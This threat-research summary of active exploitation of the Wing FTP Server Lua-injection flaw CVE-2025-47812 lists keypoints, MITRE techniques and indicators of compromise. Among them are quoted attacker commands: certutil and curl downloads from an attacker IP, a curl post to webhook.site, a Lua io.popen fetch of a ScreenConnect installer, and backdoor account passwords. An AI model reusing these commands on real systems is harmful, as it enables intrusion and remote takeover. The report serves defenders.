Threat Research

Exploitation Wing FTP Server Vulnerability

Huntress
Exploitation Wing FTP Server Vulnerability

Huntress detected active exploitation of CVE-2025-47812, a null byte and Lua injection vulnerability in Wing FTP Server, on July 1, 2025. The exploit allows remote code execution at root/SYSTEM level, and attackers attempted various post-exploitation activities before being stopped by Microsoft Defender. #CVE202547812 #WingFTPServer #TrojanWin32CeproladA

Keypoints

  • CVE-2025-47812 is a null byte and Lua injection vulnerability in Wing FTP Server versions prior to 7.4.4 allowing root/SYSTEM remote code execution.
  • Exploitation was first observed by Huntress on July 1, 2025, shortly after public disclosure on June 30, 2025.
  • The exploit uses a crafted username with a null byte to inject Lua code into session object files, which is triggered by normal server operations.
  • Attackers performed reconnaissance commands, created backdoor user accounts, and attempted to run malicious scripts and download payloads.
  • Microsoft Defender detected and blocked a planted beacon Trojan:Win32/Ceprolad.A, disrupting the attack and crashing the Wing FTP Server process.
  • Multiple attacker IPs and infrastructure were identified, including use of webhook.site and ScreenConnect for remote access attempts.
  • Organizations running Wing FTP Server are urged to update immediately to version 7.4.4 to mitigate active exploitation.

MITRE Techniques

  • [T1078] Valid Accounts – Attackers used known or anonymous accounts to authenticate and initiate the exploit (‘A login attempt is made against the loginok.html endpoint via POST request’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The adversary executed reconnaissance and persistence commands such as ‘net user’ and ‘ipconfig’ using cmd.exe.
  • [T1105] Ingress Tool Transfer – Attackers downloaded malicious payloads using certutil and curl (‘certutil -urlcache -f http://185.196.9.225:8080/…’).
  • [T1136] Create Account – Attackers created backdoor user accounts like ‘wingftp’ and ‘wing’ using command shell commands.
  • [T1204] User Execution – Execution of malicious batch files and MSI installer attempts (‘cmd.exe /c c:/1.bat’ and download of ScreenConnect MSI installer).
  • [T1566.001] Phishing: Spearphishing Link – Use of webhook.site to communicate and track infections (‘curl -s -d con https://webhook.site/…’).
  • [T1543] Create or Modify System Process – Attempted installation and use of ScreenConnect for persistent remote access (‘local h = io.popen(“curl -o c:1.msi https://…ScreenConnect…”)’).

Indicators of Compromise

  • [IP Address] Attacker IPs involved in various stages of exploitation – 223.160.131.104, 149.248.44.88, 185.196.9.225, and others.
  • [Domain] Malicious URLs used for payload delivery and command and control – http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ, https://oooooooo11.screenconnect.com/bin/screenconnect.clientsetup.msi, https://webhook.site/5d112487-6133-4942-ac87-3f473d44bd81.
  • [File Hash] Malicious files detected – SHA256 c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4 (beacon executable), SHA256 f0fcc638cd93bdd6fb4745d75b491395a7a1b2cb08e0153a2eb417cb2f58d8ac (ScreenConnect MSI).
  • [Username] Backdoor user accounts created – wingftp, wing.
  • [Password] Passwords used by attackers for backdoor accounts – 123123qweqwe, 123123qweqweq.
  • [Detection] Microsoft Defender alert name – Trojan:Win32/Ceprolad.A.

Read more: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint